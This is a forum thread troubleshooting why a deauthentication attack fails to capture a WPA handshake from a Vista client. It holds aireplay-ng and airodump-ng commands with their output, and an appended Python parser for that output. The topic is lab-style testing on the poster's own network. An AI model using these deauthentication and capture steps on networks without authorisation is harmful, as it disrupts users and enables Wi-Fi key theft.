Thread: No WPA handshake for Vista Client :(

  1. #1
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    3

    Default No WPA handshake for Vista Client :(

    Hello from a newbie

    I'm not sure why, but I cannot seem to capture handshakes from a Vista client.

    I'm using BT3 and a Hawking HWUG1... it works fine when I use aireplay-ng against my phone, just not my Vista client. Not sure what I am doing wrong... Here is what I am doing:

    modprobe -r rt73
    modprobe rt73
    ifconfig rausb0 up
    iwpriv rausb0 forceprism 1
    iwpriv rausb0 rfmontx 1
    iwconfig rausb0 mode monitor

    And just to be sure I am in monitor mode, I do again

    airmon-ng stop rausb0
    airmon-ng start rausb0

    airodump-ng rausb0

    From this I filter on my AP, so I get:

    airodump-ng -c 6 --bssid my_AP_bssid rausb0

    (Yes my AP is on channel 6)

    On another terminal I use

    aireplay-ng -0 10 -a my_AP_bssid rausb0

    But... no handshake

    This works flawlessly with my phone, and even without the aireplay if I just listen passively. Just not with my Vista computer. And the AP and clients are within the same room, so I know distance is not a problem. Has anyone experienced this, or does anyone know why this would be the case?

    Also, I check whether I have a handshake or not by simply running aircrack-ng, which promptly informs me that I have not captured any handshakes...

    Thanks heaps from a newbie (please don't burn me if I have stated something stupid :S )

  2. #2
    Senior Member kidFromBigD's Avatar
    Join Date
    Jan 2010
    Location
    Texas
    Posts
    159

    Default

    Quote Originally Posted by alexinnippon View Post
    Hello from a newbie

    I'm not sure why, but I cannot seem to capture handshakes from a Vista client.

    I'm using BT3 and a Hawking HWUG1... it works fine when I use aireplay-ng against my phone, just not my Vista client. Not sure what I am doing wrong... Here is what I am doing:

    modprobe -r rt73
    modprobe rt73
    ifconfig rausb0 up
    iwpriv rausb0 forceprism 1
    iwpriv rausb0 rfmontx 1
    iwconfig rausb0 mode monitor

    And just to be sure I am in monitor mode, I do again

    airmon-ng stop rausb0
    airmon-ng start rausb0

    airodump-ng rausb0

    From this I filter on my AP, so I get:

    airodump-ng -c 6 --bssid my_AP_bssid rausb0

    (Yes my AP is on channel 6)

    On another terminal I use

    aireplay-ng -0 10 -a my_AP_bssid rausb0

    But... no handshake

    This works flawlessly with my phone, and even without the aireplay if I just listen passively. Just not with my Vista computer. And the AP and clients are within the same room, so I know distance is not a problem. Has anyone experienced this, or does anyone know why this would be the case?

    Also, I check whether I have a handshake or not by simply running aircrack-ng, which promptly informs me that I have not captured any handshakes...

    Thanks heaps from a newbie (please don't burn me if I have stated something stupid :S )
    Hmm. I think you've got the steps down OK, especially when you report that your phone is getting de-auth'ed. Perhaps it's Vista's default behaviour NOT to automatically re-associate when it gets knocked off?

    Also, I want you to post the output from your command:
    Code:
    aireplay-ng -0 10 -a my_AP_bssid rausb0
    What I expect to see is the number of de-auth acknowledgements aireplay reports. Can you post this?

    I'm thinking you in fact did de-auth the Vista box, but tell us if the box is still connected to your AP. If not, Vista knows it got de-auth'ed and won't immediately re-connect.

    Does that make sense? Try again and report back.

    Best Regards.
    You. Are. Doing. It. Wrong.
    -Gitsnik

  3. #3
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Unless one configures Vista to reconnect when a connection is dropped, it will not. That is the default setting.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  4. #4
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    3

    Default

    Thanks for the quick reply

    Quote Originally Posted by kidFromBigD View Post
    Also, I want you to post the output from your command:
    You can see below the output of aireplay-ng:

    Code:
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& rausb0
    18:53:14  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    18:53:14  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:15  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:16  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:16  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:17  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:18  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:18  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:19  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:20  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:21  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    bt ~ #
    Quote Originally Posted by kidFromBigD View Post
    I'm thinking you in fact did de-auth the Vista box, but tell us if the box is still connected to your AP. If not, Vista knows it got de-auth'ed and won't immediately re-connect.
    Unfortunately, the Vista machine just ignores the deauth completely and remains connected. I know this for sure, as I can continue to use the network on it without any type of disruption.

    My suspicion is that it somehow hides the handshake, as I can't even see it when I just listen passively while trying to connect the Vista machine to the AP.

    Also, I forgot to mention earlier that the same commands also work perfectly when I try to deauth a Windows XP machine. That gets disconnected straight away, and I can see a handshake coming in (same deal when I just listen passively).

    Just in case you need it, I have attached a "working" handshake capture from an XP machine being deauthenticated:

    Code:
     CH  6 ][ BAT: 2 hours 35 mins ][ Elapsed: 32 s ][ 2009-07-15 18:57 ][ WPA handshake: 00:&&:&&:&&
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
     00:&&:&&:&&:&&:&&  113  81      256       62    1   6  54. WPA2 CCMP   PSK  M&&&&
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    
     00:&&:&&:&&:&&:&&  00:&&:&&:&&:&&:&&   81  54- 2     0       32
    
    bt ~ #
    Thanks for your help

  5. #5
    Senior Member kidFromBigD's Avatar
    Join Date
    Jan 2010
    Location
    Texas
    Posts
    159

    Default

    Quote Originally Posted by alexinnippon View Post
    Thanks for the quick reply
    <snip>

    Thanks for your help
    The plot thickens.

    Notice the output of your aireplay-ng command:
    Code:
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& rausb0
    18:53:14  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    18:53:14  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    I've added boldface font... It's telling you to try the -c flag and de-auth a particular client. Right now, you're blasting out de-auths to everyone connected to the AP. Should work, right? Works for your phone and your XP client. Still ... can you try once more and post your output? Try using this command:
    Code:
    aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ rausb0
    Where:
    Code:
    -c 00:$$:$$:$$:$$:$$
    Is the MAC address of the Vista client.

    I'm asking you to do this since aireplay-ng will in fact tell you how many acknowledgements it detected after each de-auth it sent out. I'm expecting to see the Vista client ack the de-auth(s).

    Again, hopefully I'm making sense here.

    Let us know how it goes.
    You. Are. Doing. It. Wrong.
    -Gitsnik

  6. #6
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    3

    Default

    Hmm... you see, I was trying to play the role of a would-be hacker who didn't know the MAC of my Vista machine. And from reading around, I understood that using aireplay-ng without specifying the client would lead to the client being revealed, after which you can direct a deauth to it. This technique works when I try against the XP machine and the phone... the MAC address pops up, but actually there is no need to even attempt another deauth as a handshake comes seconds after. But since the Vista machine is also mine and I know the MAC, I can give it a shot, no probs.

    In any case, something very interesting is going on... here is why. While I was messing around with different combinations, I ran airodump-ng, and this time, I could see the Vista client's MAC address... so I tried the deauth (without specifying the client MAC), and I think it dropped me (I was managing the AP at the time, and it asked me to re-enter the username and password). So after this, I was expecting to see a handshake come in, but that never happened, and I was back onto the AP web manager and I could browse through the different settings, and even checked the attached devices, and I could see the MAC address of my Vista machine.

    Now things get even stranger... so I think, ok let me try specifying the client MAC... so I do, and as you can see below, I get 0 ACKs. But then I decide maybe it's the Hawking, so I tried with another wireless card I have (Dlink DWA-652) and you can see I get at least some ACKs... Could it be drivers (I have used rt73-k2wrlz-3.0.3)? I would not have thought so, because it works with the XP client, and the phone...
    Also, no matter what the combination, and whether I get ACKs or not, I never see a handshake coming in...

    Also, sometimes aireplay-ng just seems to sit there saying "waiting for beacon frame" when I can see the beacon count going up fast. What does that mean?

    After messing around with both adapters for a while it seems I at least get some acks with the Dlink, but never with the Hawking.

    This is really confusing :S

    Code:
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ rausb0
    19:02:55  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    19:02:55  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:02:56  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:02:57  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:02:58  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:02:59  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:00  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:02  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:03  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:04  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:05  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ ath0
    19:03:14  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 10
    
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ ath0
    19:03:39  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    19:03:39  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 3 ACKs]
    19:03:40  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:41  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:42  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:43  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:44  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:45  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:46  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:47  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:48  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ ath0
    19:03:50  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ rausb0
    19:04:09  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    19:04:09  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:10  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:11  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:13  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:14  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:15  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:16  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:17  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:18  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:19  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ ath0
    19:04:28  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ ath0
    19:05:28  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    19:05:29  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:05:30  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:05:31  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:05:40  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0|13 ACKs]
    19:05:41  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:05:42  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:05:50  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0|10 ACKs]
    19:05:50  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 1 ACKs]
    19:05:52  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:05:53  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ rausb0
    19:06:19  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    19:06:20  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:21  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:23  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:24  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:26  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:27  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:29  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:30  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:32  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:33  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    bt ~ #
    Thanks heaps for all your help.
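The ACK counts kidFromBigD asks for are the diagnostic in this thread, and the channel number in the "Waiting for beacon frame" line explains one of the ath0 runs above (the card sat on channel 10 while the AP is on 6, so it could never see the beacon). The following is an added Python helper, not code from the thread or from the aircrack-ng project, that parses a pasted aireplay-ng session into one record per invocation and classifies each run; it assumes the two numbers in "[ a| b ACKs]" are AP and client acknowledgements respectively, and its sample is constructed in the thread's output format with the thread's placeholder MACs.

```python
import re

# Assumed reading of the "[ a| b ACKs]" column: a = ACKs from the AP, b = ACKs from the client.
CMD_RE = re.compile(r"^bt ~ # aireplay-ng\s+(?P<args>.*?)\s+(?P<iface>\S+)$")
WAIT_RE = re.compile(r"Waiting for beacon frame .* on channel (?P<ch>\d+)")
DIRECTED_RE = re.compile(r"directed DeAuth\. STMAC: \[[^\]]+\] \[\s*(?P<ap>\d+)\|\s*(?P<sta>\d+) ACKs\]")
BROADCAST_RE = re.compile(r"Sending DeAuth to broadcast")

def parse_runs(text):
    """One record per aireplay-ng invocation found in a pasted terminal session."""
    runs, cur = [], None
    for line in text.splitlines():
        if (m := CMD_RE.match(line.strip())):
            cur = {"iface": m["iface"], "directed": "-c" in m["args"].split(),
                   "channel": None, "batches": 0, "ap_acks": 0, "client_acks": 0}
            runs.append(cur)
        elif cur is None:
            continue
        elif (m := WAIT_RE.search(line)):
            cur["channel"] = int(m["ch"])          # channel the card itself is tuned to
        elif (m := DIRECTED_RE.search(line)):
            cur["batches"] += 1
            cur["ap_acks"] += int(m["ap"])
            cur["client_acks"] += int(m["sta"])
        elif BROADCAST_RE.search(line):
            cur["batches"] += 1                     # broadcast batches report no ACK counts
    return runs

def diagnose(run, ap_channel):
    """Classify a run the way the thread reasons about it."""
    if run["channel"] is not None and run["channel"] != ap_channel:
        return "card on wrong channel"    # the AP's beacon can never be seen here
    if run["batches"] == 0:
        return "no beacon seen"           # aireplay-ng never left its wait loop
    if not run["directed"]:
        return "broadcast: no ACK count available"
    return "client acked" if run["client_acks"] else "client did not ack"

# Constructed sample in the thread's output format (placeholder MACs copied from it).
SAMPLE = """\
bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ rausb0
19:02:55  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
19:02:55  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ ath0
19:03:14  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 10
bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ ath0
19:05:28  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
19:05:40  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0|13 ACKs]
"""
```

Running `[diagnose(r, 6) for r in parse_runs(SAMPLE)]` labels the three sample runs as "client did not ack", "card on wrong channel" and "client acked", which is the distinction the poster was trying to make by eye across the two adapters.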
